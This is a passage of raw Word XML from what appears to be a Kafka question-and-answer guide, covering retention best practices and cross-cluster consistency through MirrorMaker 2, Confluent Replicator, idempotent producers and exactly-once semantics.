          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Under-replicated partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF749C0" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Producer errors (e.g., NOT_ENOUGH_REPLICAS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD54662" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="00B33140">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5C4C258">
          <v:rect id="_x0000_i3310" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9EC34" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE74F1F" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Tune log.retention.ms based on </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>business needs</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., audit trails, replay window).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D335FF" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>smaller log.segment.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if you want </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>finer-grained retention control</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCB5A78" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Monitor disk usage and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alert when partitions grow large</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A777A" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="00CE4B95" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1724"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cruise Control</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor retention impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72F34B" w14:textId="76CA7F97"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F1D821C">
          <v:rect id="_x0000_i3311" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EC7790" w14:textId="06263991" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E5098E" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="822" w:name="_Toc196308302"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you ensure Kafka data consistency across distributed clusters</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="822"/>
    </w:p>
    <w:p w14:paraId="02470684" w14:textId="2FFB7503" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka data consistency across distributed clusters</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is crucial when implementing </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-cluster or geo-replicated Kafka architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here’s how you can ensure consistency effectively:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D1B6EA" w14:textId="77777777" w:rsidR="00DF5B7A"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B2EDB6E">
          <v:rect id="_x0000_i3312" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D631B5A" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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1. Use Kafka MirrorMaker or MirrorMaker 2 (MM2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D55A3" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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MirrorMaker 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B377E" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Built on </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C981D" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>active-passive</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>active-active</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A48B59" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data replication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from source to target cluster </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>with offset and topic metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20827DB8" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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MM2 tracks consumer offsets and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>preserves topic partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491DD203" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can replicate topics from one Kafka cluster (e.g., US) to another (e.g., Europe) reliably using MM2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E9E16" w14:textId="77777777" w:rsidR="00DF5B7A"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FA4DF2E">
          <v:rect id="_x0000_i3313" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D37DD3" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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2. Use Confluent Replicator (Enterprise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638EB43C" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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For advanced features like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A53E8E" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172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Schema Registry replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025DC8D9" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172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Exactly-once replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EED8AA" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172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ACL replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAD590" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Better suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>critical financial or regulatory use cases</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DFE40E" w14:textId="77777777" w:rsidR="00DF5B7A"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312C7D8">
          <v:rect id="_x0000_i3314" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3CD8E9" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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3. Enable Idempotent Producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355A24BB" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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et enable.idempotence=true in Kafka producer config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3FFBB7" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate messages</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A876E4" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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ssential in multi-cluster where network issues can lead to re-sends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E5F9BE" w14:textId="77777777" w:rsidR="00DF5B7A"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2898507">
          <v:rect id="_x0000_i3315" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AAE3F6" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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4. Ensure Exactly-Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F82A9B" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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For consistent data processing, enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06877F23" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172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enable.idempotence=true</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on producers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17251AE3" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172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lastRenderedPageBreak/>
        <w:t>acks=all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058540A6" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="172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Transactions API</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (to group multiple records or operations as a unit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DCD09" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Ensures messages are </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>committed once and only once</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, even across distributed clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FBCF9" w14:textId="77777777" w:rsidR="00DF5B7A"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0C15C66">
          <v:rect id="_x0000_i3316" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8142BF" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A"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5. Consistent Topic Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA6C42" w14:textId="77777777" w:rsidR="00DF5B7A" w:rsidRPr="004269A3" w:rsidRDefault="00DF5B7A" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same topic names, partitions, and configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
